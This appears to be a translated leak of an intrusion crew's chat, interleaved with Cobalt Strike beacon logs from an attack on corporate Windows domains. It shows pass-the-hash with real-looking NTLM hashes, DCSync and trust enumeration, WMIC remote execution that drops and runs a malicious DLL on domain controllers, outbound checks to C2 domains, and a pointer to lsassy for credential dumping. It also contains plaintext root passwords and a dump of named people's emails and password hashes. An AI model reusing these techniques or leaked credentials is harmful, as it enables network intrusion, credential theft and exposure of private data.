>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]
```
AdFind: DA, EA, LA, DC, DCSync, trusts - all pulled?
Now I'm looking for the AV and NAS, right?
Yes)
Finally, after a thousand years, I'm in the datacenter))
The DLL that's on my Cobalt:
```
beacon> pth datacenter.local\Administrator c49d5b83342b859132197d0a73592c0e
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:datacenter.local /ntlm:c49d5b83342b859132197d0a73592c0e /run:"%COMSPEC% /c echo d8c5e886568 > \\.\pipe\da5531" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : administrator
domain  : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo d8c5e886568 > \\.\pipe\da5531
impers. : no
NTLM    : c49d5b83342b859132197d0a73592c0e
  |  PID  6988
  |  TID  4548
  |  LSA Process is now R/W
  |  LUID 0 ; 1615963531 (00000000:6051a58b)
  \_ msv1_0   - data copy @ 0000006D65B9E580 : OK !
  \_ kerberos - data copy @ 0000006D6776F5E8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ des_cbc_md5       -> null
   \_ des_cbc_crc       -> null
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000006D65B7B1A8 (16) -> null

beacon> shell wmic /node:10.225.10.201 process call create "cmd /c ping stormname.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping stormname.com > C:\ProgramData\p.txt"
[+] host called home, sent: 126 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 3312;
        ReturnValue = 0;
};

beacon> shell type \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:
Pinging stormname.com [104.200.67.11] with 32 bytes of data:
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55

Ping statistics for 104.200.67.11:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 51ms, Maximum = 51ms, Average = 51ms

beacon> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes

beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes

beacon> shell copy x64.dll \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: copy x64.dll \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 75 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 4664;
        ReturnValue = 0;
};

beacon> shell dir \\10.225.10.201\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\x64.dll
[+] host called home, sent: 73 bytes
[+] received output:
 Volume in drive \\10.225.10.201\C$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \\10.225.10.201\C$\ProgramData

File Not Found
```
Trying from the Cobalt: @user3 also didn't connect, although the Cobalt pings :^( Why does it see everyone but doesn't see me?
```
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct07 23:48:21> shell wmic /node:10.225.10.201 process call create "cmd /c ping passloft.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping passloft.com > C:\ProgramData\p.txt"
[+] host called home, sent: 125 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
```
```
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 464;
        ReturnValue = 0;
};
[+] host called home, sent: 32 bytes
[+] host called home, sent: 32 bytes

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct07 23:49:20> shell type \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:
Pinging passloft.com [192.169.7.15] with 32 bytes of data:
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55
Reply from 192.169.7.15: bytes=32 time=51ms TTL=55
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55

Ping statistics for 192.169.7.15:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 51ms, Maximum = 52ms, Average = 51ms

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct07 23:49:51> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes
```
Dal, isn't it really easier to just give a pass from your Cobalt? Do you want to deploy a listener to saiglobal.com?
If it doesn't see my Cobalt, what if it connects to his and then I get his Cobalt to work?
```
beacon> shell type \\10.225.10.201\C$\ProgramData\sq.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\sq.txt
[+] host called home, sent: 73 bytes
[+] received output:
Pinging firedi.com [23.106.215.146] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 23.106.215.146:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
```
You're trying to pull them in: pinging from there to your Cobalt.
```
beacon> shell ping firedi.com
[*] Tasked beacon to run: ping firedi.com
[+] host called home, sent: 46 bytes
[+] received output:
Pinging firedi.com [23.106.215.146] with 32 bytes of data:
Reply from 23.106.215.146: bytes=32 time=70ms TTL=54
Reply from 23.106.215.146: bytes=32 time=69ms TTL=54
Reply from 23.106.215.146: bytes=32 time=68ms TTL=54
Reply from 23.106.215.146: bytes=32 time=68ms TTL=54

Ping statistics for 23.106.215.146:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 68ms, Maximum = 70ms, Average = 68ms
```
Try pinging your Cobalt.
```
beacon> pth datacenter.local\Administrator c49d5b83342b859132197d0a73592c0e
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:datacenter.local /ntlm:c49d5b83342b859132197d0a73592c0e /run:"%COMSPEC% /c echo a8192f714f5 > \\.\pipe\da0134" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : administrator
domain  : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo a8192f714f5 > \\.\pipe\da0134
impers. : no
NTLM    : c49d5b83342b859132197d0a73592c0e
  |  PID  6148
  |  TID  4308
  |  LSA Process is now R/W
  |  LUID 0 ; 1594533110 (00000000:5f0aa4f6)
  \_ msv1_0   - data copy @ 0000006D664CBE00 : OK !
  \_ kerberos - data copy @ 0000006D665014C8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ des_cbc_md5       -> null
   \_ des_cbc_crc       -> null
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000006D664D0B18 (16) -> null

beacon> shell dir \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 66 bytes
[+] received output:
 Volume in drive \\10.225.10.201\C$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \\10.225.10.201\C$\ProgramData

07/16/2016  09:23 AM    <DIR>          Comms
10/06/2020  12:45 AM    <DIR>          FireEye
10/06/2020  08:24 AM             8,192 ntuser.dat
05/30/2019  02:57 PM    <DIR>          Package Cache
04/24/2019  03:13 PM    <DIR>          regid.1991-06.com.microsoft
07/16/2016  09:23 AM    <DIR>          SoftwareDistribution
02/02/2018  03:38 PM    <DIR>          USOPrivate
02/02/2018  03:38 PM    <DIR>          USOShared
03/13/2019  01:10 PM    <DIR>          VMware
               1 File(s)          8,192 bytes
               8 Dir(s)  61,425,848,320 bytes free

beacon> shell wmic /node:10.225.10.201 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[+] host called home, sent: 123 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5972;
        ReturnValue = 0;
};

beacon> shell type \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:
Pinging google.com [108.177.122.100] with 32 bytes of data:
Reply from 108.177.122.100: bytes=32 time=2ms TTL=106
Reply from 108.177.122.100: bytes=32 time=1ms TTL=106
Reply from 108.177.122.100: bytes=32 time=1ms TTL=106
Reply from 108.177.122.100: bytes=32 time=2ms TTL=106

Ping statistics for 108.177.122.100:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 2ms, Average = 1ms

beacon> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes

beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C is System
 Volume Serial Number is 9AA9-9DAB

 Directory of C:\ProgramData

07/27/2018  07:11 AM    <DIR>          AppData
10/06/2020  12:20 AM    <DIR>          FireEye
02/29/2020  03:37 PM    <DIR>          GetSupportService_N-Central
02/17/2020  02:15 PM    <DIR>          N-Able Technologies
10/07/2020  04:09 AM           262,144 ntuser.dat
08/23/2020  12:22 AM    <DIR>          Package Cache
11/21/2014  08:58 PM    <DIR>          regid.1991-06.com.microsoft
07/27/2018  07:11 AM    <DIR>          SnowSoftware
05/19/2020  01:19 PM    <DIR>          SolarWinds MSP
04/25/2020  12:00 AM    <DIR>          Tenable
07/25/2020  11:30 AM    <DIR>          VMware
10/07/2020  03:31 PM           139,680 x64.dll
               2 File(s)        401,824 bytes
              10 Dir(s)  24,960,004,096 bytes free

beacon> shell copy x64.dll \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: copy x64.dll \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 75 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 6624;
        ReturnValue = 0;
};

beacon> shell dir \\10.225.10.201\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\x64.dll
[+] host called home, sent: 73 bytes
[+] received output:
 Volume in drive \\10.225.10.201\C$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \\10.225.10.201\C$\ProgramData

File Not Found
```
No fucking way, again.
The second DC. Trying the rest too?
Well, one isn't connecting to the datacenter; not enough servers?
I wrote how the creds and the sync went and took it on the datacenter; the DLL didn't work. Stop. Have all the admins changed their passwords?
Here's the DCSync from this domain, which last time the climb didn't come from the datacenter; no creds.
SaigProd.local [10.195.100.1] - you're climbing here?
datacenter.local [10.225.10.200]
This is what you're talking about?
```
saig.frd.global [10.210.8.236]
datacenter.local [10.225.10.200]
frd.global [10.225.12.1]
saigProd.local [10.195.100.1]
c360.local [10.195.43.2]
legalco.local [10.195.23.1]
```
Are the other servers closed too?
```
beacon> shell type \\10.195.100.1\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.195.100.1\C$\ProgramData\p.txt
[+] host called home, sent: 71 bytes
[+] received output:
Pinging google.com [216.58.196.142] with 32 bytes of data:
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114

Ping statistics for 216.58.196.142:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 2ms, Maximum = 2ms, Average = 2ms
```
And in the file?
```
beacon> shell wmic /node:10.195.100.1 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.195.100.1 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[+] host called home, sent: 122 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5772;
        ReturnValue = 0;
};

beacon> shell dir \\10.195.100.1\C$\ProgramData\p.txt
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\p.txt
[+] host called home, sent: 70 bytes
[+] received output:
 Volume in drive \\10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

10/07/2020  03:38 PM               472 p.txt
               1 File(s)            472 bytes
               0 Dir(s)  63,656,124,416 bytes free
```
You still haven't pinged google from there? Can it see the outside? xD
Session is fuckin' gone again?
```
beacon> pth saigProd.local\svc.sccmcliinst aa9249f57aba289658fde8afe795fd67
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:svc.sccmcliinst /domain:SaigProd.local /ntlm:aa9249f57aba289658fde8afe795fd67 /run:"%COMSPEC% /c echo bc8a1c163ef > \\.\pipe\ef7d36" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : svc.sccmcliinst
domain  : saigProd.local
program : C:\Windows\system32\cmd.exe /c echo bc8a1c163ef > \\.\pipe\ef7d36
impers. : no
NTLM    : aa9249f57aba289658fde8afe795fd67
  |  PID  5712
  |  TID  4988
  |  LSA Process is now R/W
  |  LUID 0 ; 1593611577 (00000000:5efc9539)
  \_ msv1_0   - data copy @ 0000006D65BDB260 : OK !
  \_ kerberos - data copy @ 0000006D6776C4E8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ des_cbc_md5       -> null
   \_ des_cbc_crc       -> null
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000006D65B7ABC8 (16) -> null

beacon> ls \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to list files in \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 47 bytes
[*] Listing: \\10.195.100.1\C$\ProgramData\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/22/2013 10:48:41   Application Data
          dir     08/22/2013 10:48:41   Desktop
          dir     08/22/2013 10:48:41   Documents
          dir     10/06/2020 00:44:16   FireEye
          dir     07/16/2020 08:54:26   Microsoft
          dir     07/25/2020 03:40:51   Package Cache
          dir     11/14/2013 02:16:11   regid.1991-06.com.microsoft
          dir     08/22/2013 10:48:41   Start Menu
          dir     08/22/2013 10:48:41   Templates
          dir     07/25/2020 03:41:11   VMware
 70kb     fil     09/19/2020 21:56:17   ntuser.pol

beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\Windows

beacon> cd C:\ProgramData
[*] cd C:\ProgramData
[+] host called home, sent: 22 bytes

beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes

beacon> shell copy x64.dll \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 73 bytes
[+] received output:
        1 file(s) copied.

beacon> shell dir \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 64 bytes

beacon> shell dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] received output:
 Volume in drive \\10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

10/06/2020  12:44 AM    <DIR>          FireEye
07/25/2020  03:40 AM    <DIR>          Package Cache
11/14/2013  03:16 AM    <DIR>          regid.1991-06.com.microsoft
07/25/2020  03:41 AM    <DIR>          VMware
10/07/2020  03:31 PM           139,680 x64.dll
               1 File(s)        139,680 bytes
               4 Dir(s)  63,656,927,232 bytes free

[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] host called home, sent: 72 bytes
[+] received output:
 Volume in drive \\10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

10/07/2020  03:31 PM           139,680 x64.dll
               1 File(s)        139,680 bytes
               0 Dir(s)  63,656,927,232 bytes free

beacon> shell wmic /node:10.195.100.1 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.195.100.1 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 119 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5056;
        ReturnValue = 0;
};

beacon> shell dir \\10.195.100.1\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] host called home, sent: 72 bytes
[+] received output:
 Volume in drive \\10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

File Not Found
```
This is a local reference, because /node makes no sense if you're doing it on the dedic (dedicated server); within your own machine there is only AD.
I went to finish it for user4.
Yes, you might as well ask: if it's on the dedic, then why /node at all?
Why wmic to another host if it's on the dedic? And isn't cmd /c missing at the beginning?
@tl2 it's trying on the dedic.
Why should I do it on the dedic?
wmic starts the process in the context of a remote machine and saves the result on it. We're wasting time.
ls \\169.254.195.31\c$\ProgramData
1 more error, the path is already correct.
```
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\ProgramData\SOOQA.txt"
[*] Tasked beacon to run: wmic /node:169.254.195.31 process call create "ping google.com>C:\ProgramData\SOOQA.txt"
[+] host called home, sent: 119 bytes
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 1156;
        ReturnValue = 0;
};

 Directory of C:\ProgramData

09/28/2020  01:22 PM    <DIR>          Applications
10/05/2020  11:48 AM    <DIR>          Binary Fortress Software
10/02/2020  03:52 PM            25,604 cn-matches.txt
10/03/2020  04:18 PM             6,518 hostnames.txt
10/02/2020  03:37 PM                 0 matches-share.txt
10/02/2020  05:37 PM       818,088,516 matches_sysvol.rar
09/23/2020  12:31 PM    <DIR>          Mozilla
10/07/2020  09:03 PM               482 output.txt
09/28/2020  02:11 PM    <DIR>          Package Cache
10/03/2020  04:18 PM               511 ping.bat
10/07/2020  07:01 PM    <DIR>          regid.1991-06.com.microsoft
10/03/2020  08:19 PM            18,878 result.txt
               7 File(s)    818,140,509 bytes
               5 Dir(s)  168,773,038,080 bytes free
```
Actually, this pinging thing is kind of painful; should I pay attention to the ping?
```
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
```
C:\ProgramData
You're right about this bullshit.
Sort it out. I'll tell you again: you'll forget it even if you download the logs from the Cobalt, and there will be regular commands there. Write them down, remember it. It really fucks me up; I've written about this error many times. I won't tell you, because it's been sorted out.
```
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
[*] Tasked beacon to run: wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
[+] host called home, sent: 120 bytes

beacon> shell dir
[*] Tasked beacon to run: dir
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5764;
        ReturnValue = 0;
};
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 4C8B-2027

 Directory of C:\ProgramData

09/28/2020  01:22 PM    <DIR>          Applications
10/05/2020  11:48 AM    <DIR>          Binary Fortress Software
10/02/2020  03:52 PM            25,604 cn-matches.txt
10/03/2020  04:18 PM             6,518 hostnames.txt
10/02/2020  03:37 PM                 0 matches-share.txt
10/02/2020  05:37 PM       818,088,516 matches_sysvol.rar
09/23/2020  12:31 PM    <DIR>          Mozilla
10/07/2020  09:03 PM               482 output.txt
09/28/2020  02:11 PM    <DIR>          Package Cache
10/03/2020  04:18 PM               511 ping.bat
10/07/2020  07:01 PM    <DIR>          regid.1991-06.com.microsoft
10/03/2020  08:19 PM            18,878 result.txt
               7 File(s)    818,140,509 bytes
               5 Dir(s)  168,773,058,560 bytes free
```
You say the time is ticking. No, tell me what exactly the error fucked up. I don't see what you did; where is the output of the command that didn't work? Nothing worked. What should I check? 1+1: where the ping in wmic doesn't work, your ping works, so fucking think. Am I on the dedic with saiglobal?
Yes, I mean I didn't understand ))))))
And then you didn't say to do the ping inside, so you had already opened access.
```
beacon> shell ping google.com > C:\ProgramData\output.txt
[*] Tasked beacon to run: ping google.com > C:\ProgramData\output.txt
[+] host called home, sent: 74 bytes

beacon> cd C:\ProgramData
[*] cd C:\ProgramData
[+] host called home, sent: 22 bytes

beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 4C8B-2027

 Directory of C:\ProgramData

09/28/2020  01:22 PM    <DIR>          Applications
10/05/2020  11:48 AM    <DIR>          Binary Fortress Software
10/02/2020  03:52 PM            25,604 cn-matches.txt
10/03/2020  04:18 PM             6,518 hostnames.txt
10/02/2020  03:37 PM                 0 matches-share.txt
10/02/2020  05:37 PM       818,088,516 matches_sysvol.rar
09/23/2020  12:31 PM    <DIR>          Mozilla
10/07/2020  09:03 PM               482 output.txt
09/28/2020  02:11 PM    <DIR>          Package Cache
10/03/2020  04:18 PM               511 ping.bat
10/07/2020  07:01 PM    <DIR>          regid.1991-06.com.microsoft
10/03/2020  08:19 PM            18,878 result.txt
               7 File(s)    818,140,509 bytes
               5 Dir(s)  168,773,152,768 bytes free
```
The output command worked right away, so I had to reboot and re-spawn it; it had been on hold for 19 hours. Will it work on the dedic?
```
beacon> shell wmic /node:10.225.10.200 process call create "ping google.com>C:\Windows\Temp\output.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.200 process call create "ping google.com>C:\Windows\Temp\output.txt"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 3660;
        ReturnValue = 0;
};
```
Tell me how to ping hosts from there)
The clock is ticking here; it doesn't let go. You have a full hell there: hashes, etc.
Open any other server.
datacenter.local, what domain?
The file is not on the machine.
Trying to ping google from there with the output into the file. Does it see the outside?
What to do? Threw the DLL at 10.225.10.200 and ran it; this came out:
```
beacon> shell wmic /node:10.225.10.200 process call create "rundll32 C:\Windows\Temp\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.200 process call create "rundll32 C:\Windows\Temp\x64.dll entryPoint"
[+] host called home, sent: 121 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 964;
        ReturnValue = 0;
};
```
The case worked and was deleted, but no session, and no process on the remote machine either.
@user4+ is it me, or why the message above?
1
2
1? Is it who?
Successfully pinged trusts:
```
saig.frd.global [10.210.8.236]
datacenter.local [10.225.10.200]
frd.global [10.225.12.1]
saigProd.local [10.195.100.1]
c360.local [10.195.43.2]
legalco.local [10.195.23.1]
```
Now I took off there where all the requirements are fulfilled; where are the AVs, NASes and other things found?
datacenter.local, c360.local standard, legalco.local, frd.global - is that right?
```
192.169.6.100 u: root p: DG8mZZyB
---
192.52.167.104 u: root p: PeEDMf5q
```
Friends, I have no strength at all, I'm leaving for today. If you manage to raise any other network in addition to the one that was raised with the correct rights, and you have the strength, get to the domain controller and put in a sleep of 180; a couple or three server sessions would be good.
aha)
aha, it would be good))))
aha, autopwn, you give) drive machines in a bunch; where the rights fit, lsass will be dumped there and spat into the console. I've already dreamed of it...
(or dump lsass from each by hand). You don't need to create a session on each; it only works on those machines where you have admin creds. Yes, more here.... oh....... look at the screenshot.
It's probably pointless, because on the machine, yes, he is not an admin or anything.
This isn't serious. I am not a translator of obvious articles. All the same, `[/][:]@` what is there to specify?)
↪ lsassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [/][:]@
What? What are you talking about?)
That is, run it without specifying credentials, with a target on the machine where the DA sits?
They just go to the available ones.
No, of course; I only have local admins, and where the DAs sit they are not admins. Will this work?
Yeah, let me try)
@user4 by the way, this fits your problem perfectly: this is for someone who has a lot of machines with admin rights but doesn't have the right users https://securityonline.info/lsassy-extract-credentials-from-lsass-remotely/
Wait for the usual hours off, apparently.
There are no DAs?
```
1 2 0 2 0 192.168.1.3 111.93.129.174 4 65001 39464642424631363643424635374341 1 5 0 2 1:28800 2 47726F757056504E 1 31 3:32 3:2:0:0:32 1:3600 0 192.168.1.3:255.255.255.255
```
gvcauto.log - that's why I asked in WHICH TERMINAL, and for the Windows lnkinfo I don't know; I thought you were checking on his PC in the terminal. I asked because $ is not cmd. You haven't checked the holes at all?
On your computer, through lnkinfo *.rcf, in what terminal?
In the terminal: ~/Desktop/New_New/lnk$ lnkinfo "Connection to 106.51.226.49.lnk"
The command? With your own hands, what did you do?
```
Description            : Connection to 111.93.129.174
Relative path          : ..\..\..\Program Files\SonicWall\Global VPN Client\SWGVC.exe
Working directory      : C:\Program Files\SonicWall\Global VPN Client
Command line arguments : /E "111.93.129.174"
```
```
Description            : Connection to 106.51.226.49
Relative path          : ..\..\..\Program Files\SonicWall\Global VPN Client\SWGVC.exe
Working directory      : C:\Program Files\SonicWall\Global VPN Client
Command line arguments : /E "106.51.226.49"
```
Thank you.
```
28b3c260711a284559121c3986ca93b65df28706a43fe7a2234a0fdf79904268 2039005F
20733646ed4d68a7243b06d6c2f81c64a60ea0a5e309219595d1493a9b59d1c5 382A0473
e51ae5f54a13577b4eedab3d4c2836b644757c7c99b9d865aa39918079d7844c 51692370
a38df217726c7869140d147ae1c06c3b3ae3dd9f513872614dcbdbb9fc80822e AF2319AB
a10e69c47b04ee897a784f8c55cc222c26d034dbfc622826586e31f429848383 9569F458
06dee60f4c72a87a1a86e3ffca40c5906a83f9cf1394b27e6d7b13d3d034da4a 564273C6
42ca67a00c3692ccdf792e01e3bd25a5a66ddcce5ff6bc4314e804cc6e22d12c 1D849510
03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4 1234
a6b2ff167350bc4e65ce22f5d41a31cf5db73d5228d377b254a77f2df5967be7 CBCB9373
fe03e51728e1515d9bd9182cedcdd6cb897cd4829e48cf2cacf3d83cda4d2ab1 127010CA
fd5ad27c0a5c5e8046ba867ac37b42c72ca9366783b6129940e8deca384fb945 FFC77685
2cb025bc62d110e7beec6c45fbfe795352c4194b751e1a6e18df3c47a0cd79f7 BACBC590
c5e9cbd9bb4223ce7750d64000e82c0fc8664a666feba9fdbd994a9530c4d6c8 D4FF4357
9dc9c5a3aafdd7856a724723a9a92672a5c86165f360c634658d76f428550b6e CDDAC102
```
@tl1 can you check the hashes?
User Id User Password Email Id Middle Name Last Name First Name HP20196201010102538109914HP 8eb99a99dde701da48e6150d801ad8c489e0de5599a11fd7e7bd18ebc32a64a9 harjeetroadlines95+11@gmail.com Singh Vinod HP20196201010142798572023HP 0293fbd8830316737c35ec729612de73c204e35d14c8d627169ec4e2a2e3af9a harjeetroadlines95+12@gmail.com Shinde Suresh HP2019620101016624821422HP fa2add98c1722c776b4e85a66c88fdf49a5c395ba64471fb0011d2ab1c7897b1 harjeetroadlines95+45@gmail.com Singh Daljeet HP20196201010184360973695HP 28b3c260711a284559121c3986ca93b65df28706a43fe7a2234a0fdf79904268 harjeetroadlines95+15@gmail.com singh Tulsi HP201962901010225863663965HP 20733646ed4d68a7243b06d6c2f81c64a60ea0a5e309219595d1493a9b59d1c5 harjeetroadlines95+48@gmail.com bhaurao Shelke Manik HP20196201010269661194147HP 6bbfa3023e958dd30762b74abc3be2d37011b9471c4c6848550b4c268cabaa9f harjeetroadlines95+53@gmail.com Shoib Mohd HP201962901010312857813028HP de5d3c3ab9122d51c37a0dab08ba1a96d8e276b44a4888b837a3326e5a7d1fb0 harjeetroadlines95+19@gmail.com Kumar yadav Ajay HP201962901010355940386359HP 0724211d5b4f0a3885a48eb47c8bf69857878f6582127f76f517daa083046f2d1f harjeetroadlines95+29@gmail.com Prasad yadav 